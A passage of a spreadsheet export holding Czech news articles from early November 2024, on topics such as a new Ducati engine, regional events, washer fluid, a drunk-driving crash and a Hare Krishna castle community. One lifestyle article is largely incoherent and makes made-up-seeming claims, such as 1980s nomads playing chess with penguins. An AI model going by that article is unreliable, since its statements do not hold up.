Superquadro, a o necelých 6 kilogramů lehčí než motory Testastretta Evoluzione a Desmodue Scrambler. Zajímavostí je řešení vodního chlazení, které prochází přímo blokem, a vodní pumpa je umístěná v přední hlavě, čímž se eliminuje množství hadic kolem motoru . Ze stejného důvodu je mezi válci umístěn výměník voda/olej , aby tu nemusel být olejový chladič. Spojka je osmilamelová, anti-hoppingová a šestistupňová převodovka má integrované rychlořazení DQS 3.0 , takže není potřeba spínač na táhle řadicí páčky. Sání tvoří dvojice škrticích klapek o průměru 52 milimetrů , ovládaná samozřejmě elektronicky pomocí ride-by-wire . Elektronika umožňuje vedle volby jízdních režimů dávkování točivého momentu specificky pro každý rychlostní stupeň a motor má čidlo klepání , takže zvládne fungovat i s benzínem s nižším oktanovým číslem. Do sání vede i obtoková větev , spojující airbox a sací hrdla hned u ventilů. Podle Ducati má tento systém „zlepšovat poměr směsi pro dosažení lepší spotřeby“. Takže se vlastně jedná o emisní systém, aby motor běhal chudší a měj nižší emise. Teď už zbývá jen to, do jakých motorek Ducati nový dvouválec zabuduje. Dozvíme se to již brzy – první modely s motorem, jež zatím nebyl pojmenován jinak než prostě „V2“ – se představí v rámci dalších Ducati World Première u příležitosti veletrhu EICMA v úterý 5. listopadu. Informace o redaktorovi Dominik Valášek - ( Odebírat články autora ) POKRAČOVAT V DALŠÍ KAPITOLE Autor: Dominik Valášek Autor person Dominik Valášek Rubrika transition_slide w</t>
  </si>
  <si>
    <t>37850</t>
  </si>
  <si>
    <t>33360</t>
  </si>
  <si>
    <t>20241101_411_3242137566_732a43e9928347b4f684.html</t>
  </si>
  <si>
    <t>732a43e9928347b4f684</t>
  </si>
  <si>
    <t>Ochutnají husí pochoutky</t>
  </si>
  <si>
    <t>Ochutnají husí pochoutky 1. listopadu 2024 8:00 Olomouc hostí svátky vína a husích laskomin. Tradiční Svatomartinské slavnosti se konají 8. a 9. listopadu na Horním a Dolním náměstí. Návštěvníci mohou ochutnat na čtyři desítky mladých vín, nebudou chybět ani vyhlášené husí speciality. Organizátoři připravili i bohatý doprovodný program. Taky přijede svatý Martin na bílém koni, který dorazí na náměstí v sobotu v 11 hodin. Stánky s vínem a občerstvením budou otevřeny po oba dny od 11 do 22 hodin. | foto: MAFRA Prostějov Oslaví Dny pro Izrael Odborníci na Blízký východ v pondělí 4. listopadu vystoupí v Prostějově . Na diskusním večeru s návštěvníky oslaví Dny pro Izrael na Moravě . Přednášet a debatovat budou předseda Mezinárodního křesťanského velvyslanectví Jeruzalém Mojmír Kallus, vojenský historik Jaromír Vykoukal a šéfredaktor webu Israel.cz Daniel Žingor. Diskuse začne v 17.30 v podkrovním sále městské knihovny. Organizátoři účastníky seznámí s aktuálními tématy navazujícími na židovství. Vstupné je dobrovolné. Olomouc Lidé si zabruslí zdarma I letos Olomoučané nepřijdou o oblíbené kluziště, na kterém si mohou zadarmo zabruslit, a to v nádherných zimních kulisách. Ledová plocha vyroste v areálu městské tržnice v sousedství vyhlídkového kola a stánků s vánočním sortimentem, v provozu bude od 6. listopadu do 5. ledna. Součástí kluziště bude šatna, prostor pro přezouvání, půjčovna bruslí a veřejné WC, vstup na ledovou plochu je zdarma. Lidé se mohou těšit i na doprovodný program včetně charitativních akcí a show na ledě. Autor: kji Autor: kji Autor person kji Rubrika transition_slide Metro - Olomoucký kraj</t>
  </si>
  <si>
    <t>20241101_412_3242435969_bff87002275c0e5951d0.html</t>
  </si>
  <si>
    <t>bff87002275c0e5951d0</t>
  </si>
  <si>
    <t>Zimní kapalina do ostřikovačů – přišel její čas</t>
  </si>
  <si>
    <t>Zimní kapalina do ostřikovačů – přišel její čas 1. 11. 2024 2 min. čtení diskuze ( 0 ) Je to pár týdnů, co jsme se mohli válet u rybníka. Poměrně rychle se to otočilo a přichází klasické podzimní sychravo s chladnými rány. Tedy čas na zimní kapalinu. Články na téma zimní směs do ostřikovačů: Jak vybrat zimní směs do ostřikovačů? - již brzy Letní kapalina do ostřikovačů vám zmrzne Obvyklý problém, který potkal snad každého motoristu – zamrzlá směs v ostřikovačích. Nevěřili byste, jak dokáže taková věc zkazit cestu, když nemáte možnost si přední sklo trochu ošplíchnout a stěrači si nečistoty jenom roztíráte, čímž situaci jenom zhoršujete. A i když se trochu oteplí, zmrzlá kapalina rozhodně nepovolí během pár minut. Proto je lepší výměnu úplně nezanedbat, protože zmrzlá kapalina se vyndává dost špatně. A jak se zbavit té letní? Nějaký univerzální návod vám neposkytneme, pokud jste šetřílci můžete ji vycucnout do kanystru a schovat, ona se zase za půl roku šikne. Nebo ji jednoduše vystříkejte a je to. Pokud chcete letní namíchat se zimní, tak to udělejte pořádně. V hadičkách totiž zůstane pořád letní a promíchá se akorát obsah nádoby. Což je vám logicky k ničemu, když obsah hadiček zmrzne… Také čtěte 16. 10. 2024 Jakub Mokříš Tipy a rady Doporučit smíchání obou kapalin ale úplně nelze. Jistě, jestliže je té letní v nádobce už minimum, nic se nestane, ale pokud to střihnete půl napůl, nebude to zdaleka tak nemrznoucí směs, jak si možná myslíte. Poznáte to třeba při jízdě, kdy kapalina může na předním skle začít namrzat, samozřejmě za teplot pod nulou. Jak je to možné? Odpaří se totiž alkoholová složka, tedy methanol nebo ethanol. Zbyde voda s trochou detergentu a parfému, která se chová… jako voda. Jakou zimní směs vybrat? Úvodem jedna rada jak ušetřit. Pokud nutně nemusíte, nekupujte kapalinu do ostřikovačů na čerpačce. Tam se jedná o snad nejpředraženější komoditu. Sem tam narazíte na slevové akce v supermarketech, případně se dá docela výhodně koupit kapalina i online. Jistotou jsou samozřejmě specializované obchody s autodíly a podobně. Zimní kapalina má za úkol především nezmrznout, čehož se dosahuje, jak už bylo uvedeno, s pomocí ethanolu nebo methanolu. Kvalitnější je ethanol, který je přírodním lihem, není toxický a je šetrnější k pryžovým a plastovým materiálům. Proto se podívejte, z čeho je směs složena a vybírejte primárně ty s ethanolem. Když už se budete dívat na složení, hledejte i aceton. V levnějších směsích ho najdete, funguje jako poměrně účinné rozpouštědlo a není úplně dobré, když přichází do kontaktu s plasty, pryží nebo lakem auta. Jistě, ve směsi ho nebude tolik, aby během několika sekund proleptal lak, ale je to něco, s čím nechcete, aby váš vůz přišel do kontaktu. Zdroj info: motor1, carandriver, autoexpress, carmechanic, tremec-blog, engineering explained. Zdroj médií: Depositphotos. Autor: Portál řidiče Newsdesk Autor person Jakub Mokříš</t>
  </si>
  <si>
    <t>34980</t>
  </si>
  <si>
    <t>52930</t>
  </si>
  <si>
    <t>20241101_413_3242526355_205731da66cad7c4a059.html</t>
  </si>
  <si>
    <t>205731da66cad7c4a059</t>
  </si>
  <si>
    <t>Video: Vojta Bláha ví, kolik váží kola české enduro špičky?</t>
  </si>
  <si>
    <t>Video: Vojta Bláha ví, kolik váží kola české enduro špičky? Autor: Keli, kategorie: Video, vydáno: 1.11.2024 Při příležitosti závodu Blinduro Podzim na Plešivci ( report zde ) uspořádat Vojta Bláha mezi závodníky zajímavou anketu ve které zjišťoval kolik váží jejich kola. Možná vás některá čísla překvapí. Jak si stojíte vy? Zaklikni hmotnost svého enduro kola v anketě! Vojta Bláha anketa X Nezobrazovat Podpoř DK aneb kup nám pivo Podpořte autora mikroplatbou a kupte mu pivo ! Vaše gesto ocení jeho tvůrčí úsilí a poskytne mu motivaci pro další práci. Pomozte udržet kvalitu obsahu a podpořte naši tvůrčí komunitu. Vaše podpora je cenná a oceňovaná. Můžete poslat jedno, dvě piva , jedno pětipivo a nebo jakoukoliv částku. Děkujeme za vaši velkorysost! Zde je stručný návod, jak zaplatit pomocí QR kódu: Otevřete platební aplikaci a vyberte možnost "Skenovat QR kód". Nasměrujte kameru na vybraný QR kód výše. Potvrďte platbu a zkontrolujte informace. Dokončete platbu. Podobné články Autor: Filip Švrček Autor person Filip Švrček Rubrika transition_slide website</t>
  </si>
  <si>
    <t>3800</t>
  </si>
  <si>
    <t>2280</t>
  </si>
  <si>
    <t>20241101_414_3242071187_dcc248ddd916f2f21368.html</t>
  </si>
  <si>
    <t>dcc248ddd916f2f21368</t>
  </si>
  <si>
    <t>Jak se správně bavit v době digitálních nomádů a smartphonů</t>
  </si>
  <si>
    <t>Jak se správně bavit v době digitálních nomádů a smartphonů autor: Redakce Nezdrave.cz | 01.11.2024 | Lifestyl V dnešní době, kdy většina z nás běhá s mobilem v jedné ruce a kávou v druhé, je umění bavit se jaksi pozapomenutou dovedností. Ve světě, kde si mladí lidé budují kariéru přes TikTok a generace našich rodičů se snaží pochopit pojmy jako “influencer” nebo “selfie”, se to zdá být jako oříšek. Přesto, nebo možná právě proto, je důležité nezapomínat na staré dobré radosti a radostně se smát. V tomto článku se zaměříme na to, jak si užít život v době, kdy může být chat lehčí než osobní setkání. Ztracený v digitálním světě Co je to „digitální nomád“? To už dnes víme, ale možná vás překvapí fakt, že první takový „némý test“ proběhl už v 80. letech, kdy se pár nadšenců pokusilo spojit život s prací na dálku. Dnes máme obavy, že nám wifi signál vypadne na pláži v Thajsku , zatímco oni hráli šachy s pingviny na Antarktidě, aby si ověřili, jestli je kousek ledu dostatečně stabilní na práci s laptopem. Na rozdíl od tehdejších pionýrů v oboru se my už nezabýváme zasněnými představami, ale každodenním zeběháním mezi Starbucks a coworkingem, přičemž se snažíme zachovat zdravé duševní zdraví. Jakmile se ponoříme do digitálního víru, riskujeme, že se zapomene na zábavu, staré dobré „nicnedělání“ a sdílení příběhů s přáteli. Tady je ten trik: začněte brát svoje volno vážně a vytvořte si hitparádu aktivit, které vám zvednou náladu a vymytí mozku. Neříkám, že se máte vyslat na víkendový wellness pobyt do Alp, stačí, když se seberete a vyrazíte na neprozkoumané místo ve městě. Možná narazíte na skvělou street food akci, nebo objevitel na kole, který uvízl v šíleném konceptu s umělými květinami. V takovém momentě si člověk uvědomí, že je třeba vyhnout se daním, ale není potřeba se vyhýbat zábavě. Humor jako zbraň A teď trošku vážně: kdo z vás by se bavil se smutným člověkem? Víte, jak to chodí, humor dokáže udělat divy. Nejde přitom o to být komikem nebo umět vyprávět vtipy. Jde spíš o to, umět se smát sám sobě a ošetřit nicotnost svých nervů na tom, co je nesmírně korigované. Jestliže se nedokážeme smát, když se nám rozmočila večeře, pak je něco špatně! Zábava je jako oxytocin, dávající nám pocit štěstí a spojení s ostatními, které je jako nejlepší adrenalin pro naše duše. Svět je plný absurdity, tak proč si z toho nevzít malou porci pro sebe? Také je dobré si občas dopřát malou oslavu minulosti – vzpomeňte si na svoje dávné kamarády z bývalého sezení, zavolejte jim a zahrňte nasávací vzpomínky ze školních let do dnešní „dospělácké“ konverzace. K tomu je dobré hojnit formuláře, abyste se vyhnuli nudnému přednesu, jako jsou večeře pro Salu . Nejdřív káva, pak víno a nakonec přejděte na téma, které se dostane k absurdnosti téhož tématu. Ten rozdíl je, že teď si pamatujete, jaké to bylo, a že mohla být taková hromada srandy i s prázdným talířem. Když se chystáte na noční akci, optimismus je král. Změňte trasu ve městě, objevte místa, o kterých jste zatím jen slyšeli, a udělejte ze svého pátečního večera událost, na kterou budete ve slovenské Liptovské Teplé vzpomínat do důchodu. A když vám někdo opravdu rozbije náladu, neváhejte ihned přidat: „Nech mě být, hele, mám v plánu se bavit a užívat si, dokud to dává smysl!“ V dnešní uspěchané době je důležitější než kdy jindy si uvědomit, že zábava je něco, co si musíme naprogramovat ve své rutině. A pokud najednou dostanete pocit, že vám toho času ubývá, zkuste vzít život jako naprosto nekonečnou party, kde opravdu platí pravidlo: „Kdo se neúčastní, ten se vlastně nezabaví.“ S drsným srdcem a nezapomenutelnými okamžiky, čeká na vás skvělá zábava, kterou si zasloužíte. Tak vzpřerte se, nastavte reproduktory a prostě začněte řádit. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_415_3264395699_d50c098041deff2aa5d9.html</t>
  </si>
  <si>
    <t>d50c098041deff2aa5d9</t>
  </si>
  <si>
    <t>Opilý řidič přehlédl bagr</t>
  </si>
  <si>
    <t>Opilý řidič přehlédl bagr U noční dopravní nehody zasahovaly všechny záchranné složky Autor: Karel Aleš sobota 2. listopadu 13:57, aktualizace 14:20 Alkohol Nehody Partner článku – Toyota Dolák V noci na dnešek ve tři hodiny došlo v Hodyni , což je vesnice, část města Kožlany v severní části okresu Plzeň -sever, k dopravní nehodě, během které se střetlo osobní auto, ve kterém cestovaly dvě osoby, s odstaveným bagrem. Z místa bylo hlášeno zranění jednoho muže, takže k nehodě okamžitě vyjely všechny záchranné složky. Zraněnému muži poskytli hasiči předlékařskou pomoc a poté ho předali záchranářům. "Mohu potvrdit, že naše posádka zasahovala u dopravní nehody osobního automobilu. Na místě jsme ošetřili muže narozeného v roce 1994 a následně jsme ho transportovali se zraněním lehčího charakteru do Masarykovy nemocnice Rakovník ," uvedl nám mluvčí záchranářů. Hasiči mezitím zajistili prostor nehody, provedli protipožární opatření a pomocí sorbentu zlikvidovali uniklé provozní kapaliny. Okolnosti nehody šetří policisté, zatím je možné pouze uvést, že u řidiče byla provedenou dechovou zkouškou prokázána hodnota 1,5 promile alkoholu . Foto: hasiči Kralovice Autor: Karel Aleš Autor person Karel Aleš</t>
  </si>
  <si>
    <t>20241101_416_3242016125_0ef1b57a2f71966d4045.html</t>
  </si>
  <si>
    <t>0ef1b57a2f71966d4045</t>
  </si>
  <si>
    <t>Mantry v pohádkových kulisách. Komunita Hare Krišna našla zázemí na zámku na jihu Belgie</t>
  </si>
  <si>
    <t>Mantry v pohádkových kulisách. Komunita Hare Krišna našla zázemí na zámku na jihu Belgie Členové náboženského hnutí Hare Krišna zakládají svá centra po celém světě. Jen málokde ale našli tak atraktivní sídlo jako na jihu Belgie . Ve vesničce Petite-Somme ve valonské části země se už v 70. letech usadili v areálu stejnojmenného středověkého zámku. Namísto portrétů šlechticů tak dnes na stěnách visí vyobrazení boha Krišny a komnatami se rozléhají hinduistické zpěvy. Jako chrám pro komunitu tady na zámku slouží tři průchozí salónky. Ten největší se v neděli po poledni zaplnil lidmi, kteří zpívají mantru Hare Krišna. Ve vzduchu je cítit kadidlo, oltář je plný barevných sošek, květin, zvonků a korálků . K společnému obřadu se tu lidé scházejí i devětkrát denně. Visvambharovi rodiče se potkali ve zdejší komunitě Hare Krišna | foto: Zdeňka Trachtová , Český rozhlas Po zámku mě provází Visvambhar, mladý muž s typicky vyholenou hlavou a malým drdůlkem na hlavě. „Jsem z Belgie , přímo odsud. Můj otec je Belgičan, matka je původně z Indie . Potkali se prostřednictvím této komunity,“ představuje se. Komunita vyznavačů Hare Krišna ve vesničce Petite-Somme má asi 150 členů včetně dětí. Pocházejí z celé Evropy a mezi sebou mluví anglicky. Přímo tady na zámku žije pouze několik mnichů a mnišek, ostatní bydli v bytech a domech pár minut cesty odsud. Z Amsterodamu na zámek „Původně jsme byli Hare Krišna z Amsterodamu . Chtěli jsme ale najít místo, kde budeme fungovat soběstačně. A tak jsme hledali velký pozemek a také nějaké budovy, kde bychom mohli pracovat,“ vypráví Visvambhar. „V oblasti Amsterodamu ale bylo všechno moc drahé, stejně tak v celém Holandsku . V severní Belgii jsme taky nic nenašli. Nakonec jsme narazili na toto místo za dobrou cenu.“ Zámek byl postavený v 19. století v neogotickém stylu, na místě starého středověkého hradu z 11. století | foto: Zdeňka Trachtová , Český rozhlas Zámek byl postavený v 19. století v neogotickém stylu, na místě starého středověkého hradu z 11. století. Duchovní komunita v něm dnes kromě chrámu provozuje také vegetariánskou restauraci, pekárnu a obchůdek. „Je to 47 hektarů půdy, takže dost lesů a polí. Udělali jsme tu celkem pokrok. Nemůžeme sice zatím říct, že jsme soběstační, ale máme vlastní elektřinu ze solárních panelů a taky vlastní zdroj vody ze studny,“ popisuje Visvambhar. Komunita také pěstuje zeleninu a chová několik krav, které se pasou na loukách v okolí zámku. Ve stodole zůstalo jen dvouměsíční telátko jménem Hamsi. Wellfare chov a sousedské vztahy „Vidíte, že je velmi ráda s lidmi, je hodně živá. Ale u některých dalších krav, které jsme koupili z jiných farem, sledujeme, že na lidi nejsou zvyklé, protože s nimi vždy zacházeli velmi drsně,“ říká mladá žena Suravi, která má zvířata na starosti. Komunita také pěstuje zeleninu a chová několik krav, které se pasou na loukách v okolí zámku. Dvouměsíční telátko jménem Hamsi zatím zůstává ve stodole | foto: Zdeňka Trachtová , Český rozhlas Všechny krávy zde dojí ručně a nová zvířat trénuje tak, aby si na komunitu zvykly a poslouchaly základní pokyny. „Momentálně máme sedm krav. Měli jsme také dva voly, ale v létě umřeli. Náš plán je stádo zvětšit, ale momentálně máme tele a trénujeme jeho matku, která je u nás nová, takže tomu dáváme čas. Chceme, aby si zvířata na nás i na sebe navzájem nejprve zvykla,“ vysvětluje Suravi. Soužití s původními obyvateli vesnice podle Visvambhara nefungovalo vždy ideálně. Komunita tak postavila novou příjezdovou cestu, aby ostatní nezatěžovala zvýšenou dopravou. Místním také občas rozdává čerstvý chleba, zve je na své slavnosti a vztahy se prý postupně lepší. Autor: Zdeňka Trachtová, Anna Duchková Autoři Zdenka Trachtová Anna Duchková Rubrika transition_slide Zápisník zahr. zpravodajů</t>
  </si>
  <si>
    <t>15500</t>
  </si>
  <si>
    <t>18960</t>
  </si>
  <si>
    <t>20241101_417_3242042303_9db173250b34255c23c6.html</t>
  </si>
  <si>
    <t>9db173250b34255c23c6</t>
  </si>
  <si>
    <t>Kam o víkendu v Hranicích? Na koncert ZUŠ či na halloween do Loděnice</t>
  </si>
  <si>
    <t>Kam o víkendu v Hranicích? Na koncert ZUŠ či na halloween do Loděnice Cosplay festival KDY: sobota 2. listopadu, průvod od 18h KDE: OC Šantovka Olomouc ZA KOLIK : vstup volný PROČ PŘIJÍT: Již osmý ročník olomouckého Cosplay festivalu, tentokrát na téma Japonsko - anime &amp;amp; manga. Večerní průvod masek odstartuje v 18:00 hodin před multikinem Premiere Cinemas . Fotokoutky s oblíbenými hrdiny, padouchy a dalšími postavami z komiksů, her a filmů. Origami, kaligrafie a kumihimo (prastaré japonské vázání provazů). Olomoucko Halloween na hradě KDY: sobota 2. listopadu, 10-16 h KDE: Hrad Šternberk ZA KOLIK: Plné: 240 Kč, dět 6-17 let: 70 Kč. Vyřezávání dýní: 1ks: 130 Kč. Facepainting / dětské tetování: hrazeno samostatně PROČ PŘIJÍT: Strašidelné kostýmované prohlídky hradu. Halloweenská dílna nejen pro děti. Vydlabávání dýni, malování na obličej, dětské tetování. close info Zdroj: Deník/archiv zoom_in Ilustrační foto. Strašidelná zoo KDY: pátek 1. - neděle 3. listopadu, pokladny 9-16, areál do 18h KDE : Zoo Olomouc na Sv. Kopečku ZA KOLIK: dospělí 130 Kč, děti 100 Kč, rodinná (2+2) 420 Kč PROČ PŘIJÍT: I po Večeru duchů zůstává olomoucká zoo halloweensky nazdobená až do neděle 3. listopadu. Užít si tak můžete strašidelnou prohlídku v klidu a bez davů. Dušičková recese ve Ztracené KDY : sobota 2. listopadu, od 17h KDE : pivotéka Muž přes palubu, Ztracená ulice, Olomouc ZA KOLIK : vstup volný PROČ PŘIJÍT : Druhý ročník recesistické dušičkové akce pro dobré účely „ Pivo , Muž a Smrt“. Narážení piva WěnceSlav I, uvařeného speciálně pro tuto akci a také jeho křest. Hrát bude Tomáš Krejčířík (Hope Astronaut solo) i na pohřební dechovka Bumboš funeral band. Během programu pak proběhne i představení knihy Berta a dušičky olomoucké autorky Terezy Pařízkové a čtení o pohřebních rituálech. Výtěžek z prodeje piva pak půjde jako již tradičně na projekt zatokanosatychopic.cz. Otevřené ateliéry KDY: neděle 3. listopadu, 10-18 h KDE: různá místa v Olomouci ZA KOLIK : vstup volný PROČ PŘIJÍT : Otevřená studia Olomouc zpřístupňují během jednoho dne veřejnosti jinak většinou nedostupná místa, ateliéry, dílny a kreativní prostory v širším centru města. Návštěvníci tak mohou nahlédnout tvůrcům pod ruce a sami si při workshopech vybrané techniky vyzkoušet. Výběr je pestrý – nabízí jak řemeslnou, tak uměleckou tvorbu, od videa přes keramiku, malbu či tisk až po šicí dílny - seznam otevřených ateliérů zde . Olomoucko Halloweenská stezka KDY: pátek 1. listopadu, od 19 hodin KDE : ulice Petra Jilemnického , Prostějov - Vrahovice ZA KOLIK: zdarma PROČ PŘIJÍT: První ročník strašidelná stezky ve Vrahovicích . Na děti čeká spousta strašidel, které znají z hororových i pohádkových filmů. Trasa začíná v ulici Petra Jilemnického nedaleko koupaliště a účastníky provede po březích říček Romže i Hloučely. Pro všechny dětské účastníky bude čaj zdarma. Vyhodnoceny budou nejlepší masky. Cíl na fotbalovém hřišti ve Vrahovicích . Výstava ovoce, zeleniny a květin KDY : sobota 2. a neděle 3. listopadu, od 10 hodin KDE : Obecní dům , Čehovice ZA KOLIK: dobrovolné PROČ PŘIJÍT: Další ročník populární podzimní výstavy zahrádkářů z Čehovic , pod záštitou Českého zahrádkářského svazu . Těšit se můžete na pestrou škálu barev, kterou dokáže vytvořit pouze podzimní příroda. Vedle výpěstků zahrádkářů, bude i ukázka drobného zvířectva. Svými výpěstky může přispět každý občan i veřejnost. Výstava je otevřena v sobotu od 10 do 18 hodin, v neděli od 10 do 15 hodin. V sobotu od 18.30 navíc zvou zahrádkáři všechny na lampionový průvod. Sraz na dvoře Obecního domu . Halloween U Maříků KDY : sobota 2. listopadu, od 14 hodin KDE: Občerstvení U Maříků, Prostějov ZA KOLIK: zdarma PROČ PŘIJÍT: Nabité sobotní odpoledne slibuje halloweenská akce v biokoridoru Hloučela. V Občerstvení U Maříků se mohou všechny generace těšit na pekelný táborák, strašidelnou stezku (17.30) nebo příjezd přízračné cyklojízdy (20.00). Bohaté občerstvení v podobě pekelných makrel, svařáku či grogu a DJ Mateo. Strašidelný lampionový průvod KDY : pátek 1. listopadu, od 17 hodin KDE: Sportovní areál, Kostelec na Hané ZA KOLIK : zdarma PROČ PŘIJÍT: Tradiční průvod ulicemi Kostelce na Hané s lampiony a strašidly. Pro malé děti je vyhrazen čas od 17.30 do 18.30, start stezky od zahradnického centra Marciánová. Od 18.30 hodin je stezka určena pro starší děti i s děsivými strašidly. close info Zdroj: Deník / Lukáš Kaboň zoom_in Ilustrační foto Halloween Night Ride KDY: sobota 2. listopadu, od 18.30 hodin KDE: Kino Metro 70, Prostějov ZA KOLIK : zdarma PROČ PŘIJÍT: Unikátní noční jízda v maskách ulicemi Prostějova . V pořadí druhý ročník akce, při které brázdí ulice cyklisté v maskách a s osvětlením. Loutkové divadlo Přerov KDY: neděle 3. listopadu KDE: Loutkové divadlo Sokol Přerov, Brabansko 1, Přerovsko ZA KOLIK: 70 korun PROČ PŘIJÍT: Loutkové divadlo Přerov zahajuje sezonu. V neděli zahraje od 14.00 a od 16.00 pohádku Začarovaný les. Koncert Šediváci - 35 let na scéně KDY: sobota 2. listopadu od 19.00 KDE : Klub Teplo ZA KOLIK : 300 korun PROČ PŘIJÍT : Oslava přerovské kapely k příležitosti 35 let na hudební scéně. Koncert proběhne v rámci festivalu Hudboslovení. Otevřené ateliéry KDY: sobota 2. listopadu od 13.00 do 18.00 KDE: přerovské ateliéry ZA KOLIK: zdarma PROČ PŘIJÍT : Studia, umělecké dílny a kreativní prostory se ve stejný čas otevřou široké veřejnosti. Sobota 2. listopadu bude patřit Otevřeným ateliérům, které jsou součástí festivalu Olomouc Design Days. V Přerově a okolí se návštěvníkům otevře ateliér Výtvarky pro velký (Pivovarská 89, Přerov ), studio návrhářky Sandy Švédová (Lipňanská 150/20, 75127 Přerov XIII-Penčice), ateliér sklářky Adély Lakomé Dosena ( Maloprosenská 179, 751 21 Prosenice ), architektonické studio VESMĚS architekti (Velká Dlážka 527/6, Přerov ), květinový ateliér Na stonku (Wurmova 20, Přerov ) a Folklorní soubor Haná (Velká Dlážka 44, Přerov ). Halloween na Loděnici KDY: sobota 2. listopadu od 15.00 KDE : Loděnice Hranice ZA KOLIK: zdarma PROČ PŘIJÍT: Na programu bude dlabání dýní, soutěž masek, halloweenská tajenka, tvořivá dílnička, Zájemci se mohou na památku vyfotit v tematickém fotokoutku. close info Zdroj: Filip Nekola zoom_in Ilustrační foto Prohlídka hranického zámku KDY: sobota 2. listopadu ve 14.00 a 15.00 KDE : sraz ve dvoraně zámku ZA KOLIK : Vstupné je 60 Kč, vstupenky zakoupíte v Turistickém informačním centru na zámku. Na místě před prohlídkou koupit nelze! Kapacita prohlídky je 20 osob. PROČ PŘIJÍT : Zámek není jen městský úřad, ale také významná historická památka s dlouhou historií. Mnoho komnat je v běžném provozu uzavřeno, za to však skrývají nejednu nádheru. Díky této unikátní prohlídce se do těchto prostor můžete podívat. Uvidíte například krásnou štukovou výzdobu, vystoupáte do zámecké věže a také sestoupíte do hladomorny za kostlivcem. Podzimní koncert Cantabile ZUŠ Hranice KDY : pátek 1. listopadu od 17.00 KDE : hranická synagoga ZA KOLIK : vstupné dobrovolné PROČ PŘIJÍT: Společenský klub Panenka zve na Podzimní koncert Cantabile ZUŠ Hranice. Koncert se koná pod záštitou místopředsedkyně Senátu České republiky Jitky Seitlové . Výtěžek z koncertu bude použit k financování třech pilířů činnosti Společenského klubu Panenka: Panenka dětem do nemocnic * Adopce na dálku * Podpora mladých umělců. Vypsaná fiXa &amp;amp; Wohnout v Šumperku KDY : pátek 1. listopadu od 20 hod KDE : Dům kultury Šumperk ZA KOLIK : vstupné v předprodeji 620 Kč, v den akce 700 Kč PROČ PŘIJÍT: Vypsaná fiXa zahraje v Domě kultury Šumperk a oslaví zde kulaté narozeniny. Bude to oslava, která bude nezapomenutelná. Na co se můžete těšit? Nejdřív zahraje v roli narozeninového bonusu spřátelená kapela Wohnout a po nich nastoupí fiXa, která vybere to nejlepší ze svých deseti alb. Zbytek je na vás. Pozvěte všechny kamarády a dorazte si užít. close info Zdroj: Jan Zahnaš zoom_in Vypsaná fiXa Hody v Paloníně KDY : sobota 2. listopadu od 13.30 hod. KDE: Pohostinství Studánka v Paloníně ZA KOLIK : zdarma PROČ PŘIJÍT : Pojďte oslavit hodovou sezonu také do Pohostinství Studánka. Můžete se těšit na bohatý program, atrakce pro děti, kolotoč a střelnici nebo promítání pohádek. Od 14 hod. bude také otevřené minimuzeum v Paloníně a večer v salonku zahraje k poslechu a tanci kapela JPO BANS. Bude samozřejmě zajištěno i bohaté občerstvení, jako jsou zabijačkové speciality, cukrová vata nebo popcorn. Otevřené ateliéry v Jeseníku KDY: sobota 2. listopadu od 10 do 15 hod. KDE : různá místa v Jeseníku ZA KOLIK : zdarma PROČ PŘIJÍT : Letos poprvé se v Jeseníku veřejnosti otevřou jindy nepřístupné ateliéry, studia a dílny místních kreativců, kteří se představí v prostorách Divadla Petra Bezruče , parku u Vodní tvrze, výtvarném ateliéru ZUŠ, truhlárně Alternativní truhlářství Jan Mareček a dílně CoinRings. Otevřené ateliéry lákají na prohlídku kreativních prostor, seznámení s tvůrci i možnost vyzkoušet si tvorbu vlastníma rukama. Na pěti místech se vám představí nejméně sedm místních kreativců, které můžete navštívit kdykoli od 10 do 15 hod. Přehled míst a tvůrců na www.positivje.cz. Aleje v krajině. Vernisáž výstavy fotografií v Pivovaru Welzl v Zábřehu KDY : pátek 2. listopadu od 17 hod KDE: Minigalerie pivovaru Welzl, Zábřeh ZA KOLIK: zdarma PROČ PŘIJÍT: Vernisáž výstavy snímků nadšené fotografky Ivany Brzobohaté, která založila na sociální síti skupinu fotografů, která se pravidelně schází a pořádá workshopy. Sama také dílny fotografování vede. Výstava potrvá do konce prosince 2024. Podzimní výstava KDY: do neděle 3. listopadu vždy od 14 hod. KDE: Minimuzeum Police PROČ PŘIJÍT: Minimuzeum v Polici vás srdečně zve na podzimní výstavu, která se bude konat již tento víkend. Můžete se těšit na fotografie od Jany Novákové ze Zábřeha , na háčkované hračky a deky od Věry Novákové z Úsova a na gramofony od sběratele Vojtěcha Vyroubala z Litovle . Autor: Marie Sehnálková, Sára Lipenská, Zdeněk Vysloužil, Michal Kovář Autoři person Marie Sehnálková person Sára Lipenská Zdeněk Vysloužil Michal Kovář</t>
  </si>
  <si>
    <t>64239.99999999999</t>
  </si>
  <si>
    <t>37660</t>
  </si>
  <si>
    <t>20241101_418_3242113561_9ac90231f84436e8373f.html</t>
  </si>
  <si>
    <t>9ac90231f84436e8373f</t>
  </si>
  <si>
    <t>Jazzman, bohém i trans. Liberecký fotograf mapuje lidi, kteří okořeňují město</t>
  </si>
  <si>
    <t>Jazzman, bohém i trans. Liberecký fotograf mapuje lidi, kteří okořeňují město Poprvé se myšlenka na projekt Libereckého koření v hlavě Šimona Pikouse zrodila před více než deseti lety. Tehdy zemřel liberecký výtvarník, básník a bohém Luděk Roubíček alias Ludvík Fonček. Pikousovi se tehdy honilo hlavou, že je škoda, když tito obohacovatelé kulturního dění odchází a bývají zapomenuti. Jako fotograf se tak rozhodl zaměřit na lidi, které jsme mohli denně vídat v ulicích či je stále potkáváme. „Stanovil jsem si kritérium, že dotyčný člověk musí nějakým způsobem přispívat k tomu, aby byl Liberec zajímavější, pestřejší. Aby měl kulturní přesah a ovlivňoval atmosféru města,“ řekl Deníku Šimon Pikous . play_fill Liberecko V minulosti tak například zvěčnil neúnavného propagátora cyklistiky a turistiky Miroslava Těšinu, milovnici umění Ivu Vykypělovou, knihkupce Martina Fryče, spisovatele a novináře Jana Šebelku , sanitáře gynekologicko-porodnického oddělení liberecké nemocnice a technika skupiny VAR Miloslava Ondráčka či výtvarníka Rudolfa Hůlku . Nechybí ani portrét Ivety Eliášů, muže, který si díky oblibě v oblékání ženských šatů vysloužil přezdívku Panenka. K transsexualitě se hlásil už za minulého režimu. „Byl zajímavou postavou Liberce a přispíval k jeho kulturní rozmanitosti. S ním jediným jsem měl sepsanou smlouvu, dokonce jsem ho fotil za honorář. Některé liberecké postavičky se na fotky nehodí Hodně lidí mi navrhuje vyfotit Luboška, který je známou figurkou Liberce Lubošek, který je 